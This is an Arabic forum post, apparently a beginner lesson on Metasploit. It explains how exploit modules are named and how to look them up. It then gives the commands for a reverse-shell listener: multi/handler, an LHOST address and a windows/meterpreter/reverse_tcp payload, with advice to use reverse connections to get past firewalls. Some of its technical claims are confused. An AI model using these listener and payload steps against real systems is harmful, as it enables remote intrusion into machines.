بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
اول شيء :كل عام وانتم الى الله اقرب
ثاني شيء
كيف احوالكم وصحتكم وان شاء الله تكونو بخير وتصوموا ستة شوال مو مثلي :D
ثالث شيء اليوم درسنا عن الاسكبلويت exploits وما هي انواعها ووظيفتها
ووظيفتها يكمن في اسمها ونوعها
يعني درس بسيط ومفهوم بأذن الله
لأستعراض الـ exploit نضع الامر
الآن رح يظهر امامنا الثغرات
ملاحظة للثغرات والبايلود واقسامها
تكون كذا
windows/browser/yahoomessenger_fvcom
windows/ browser/ yahoomessenger_fvcom
اسم الثغرة | النوع او البرنامج المصاب | نوع النظام المصاب بالثغرة
هذه بأختصار
الآ نجي نشملها شوي
windows : كما ذكرت سابقا وهي ترمز لنوع النظام المصاب ولا يقتصر فقط على وندز وانما يشمل الجميع منل لينوكس ويونكس .. وقليل جدا ما تلاقي لينوكس ويونكس لقلة الثغرات الموجودة به لانه يستعمل امتداد tar.giz اذافة الى انها لا تحتاج اي كراك ولا غيرها ولا برامج تنفيذية .ز يعني لا يشغلها
browser : نوع البرنامج المصاب وهنا في هذه الحالة المتصفح Internet Explorer وانتم تعرفونه وتعرفون ثغرات .. بس بالميتاسبلويت جاهزة وكمان ثغرات ذات امتداد صورة :D افرح يا ولد :057:
yahoomessenger_fvcom : اسم الثغرة في مجلد الميتاسبلويت ويلزم ان يكون اسم الثغرة حسب ما هو مطلوب ضمن اكواد الثغرة
هيك هي تقسم الثغرة الى ثلاث اقسام وهي نوع النظام ونوع البرنامج المصاب واسم الثغرة
الآن لتعرف ماذا تعمل هذه الثغرة او ما البرنامج المصاب واصداره .. يكون موجود في الجانب الايمن شرح موجز بسيط عنه او بأمكانك وضع كلمة Info متبوعة بألثغرة يعني في مثالنا الاعلى يعني يكون الامر كذا
info windows/browser/yahoomessenger_fvcom
الآن يوجد ثغرات شاذة
مثل :...!!
كود PHP:
test/aggressivetest
فهي واضحة
تعمل اختيار سواء لسيرفر او نواة كيرنل
ويوجد هذه ايضا
الاغلب يظن ثغرة وهذه يا اخوان هي شبيه جدا بالنت كات .. تعمل تصنت .. لكن فقط تستعمل للميتاسبلويت لانه في اعداداتها يلزمك تضع البايلود والاي بي والبورت ... ما يهمنا الاي بي والبورت لكن اذ لم تضع البايلود فلت يتم الاستغلال يعني لا تستخدم في تصنت على سيرفرات وسيف مود .. ألخ
وهنا سأشرح استخدامها
اول شيء تستخدم امر استخدام الثغرو
كود PHP:
use multi/handler
ثاني شيء امر ادخال اي بي جهازك للتصنت
كود PHP:
set LHOST 192.168.4.101
ثالث امر ادخال البورت الذي وضعته في خيارات الثغرة او البايلود <<< رح تفهمها قريباا
وبأمكانك وضع اي بورت استخدمته انت في اختيارتك للثغرة
رابع امر وهو اختيار البايلود التي وضعتها في استغلالك لثغرة ما او وضعتها عند انشائك لبايلود .. فتضعها هناا
كود PHP:
set PAYLOAD windows/meterpreter/reverse_tcp
ويفضل للجميع اختيار الاتصال العكسي لتخطي الجدار الناري اذا لم يكن مفتوح بورت .. وهذا بعد التأكد من ان البورت مفتوح
####
اعرف طولتها عليكم
والاغلب مافهم منيح
لكن بعد الدروس القادمة رح تكونون فاهمين كل شيء ... !
$##$#$#$#$#$$$#$#$
تحياتي
لا للاحتكار
المجهوول
Fhg]vs hgohlsD hgh;sfg,dj ,hsjo]hlhjih ,hk,huih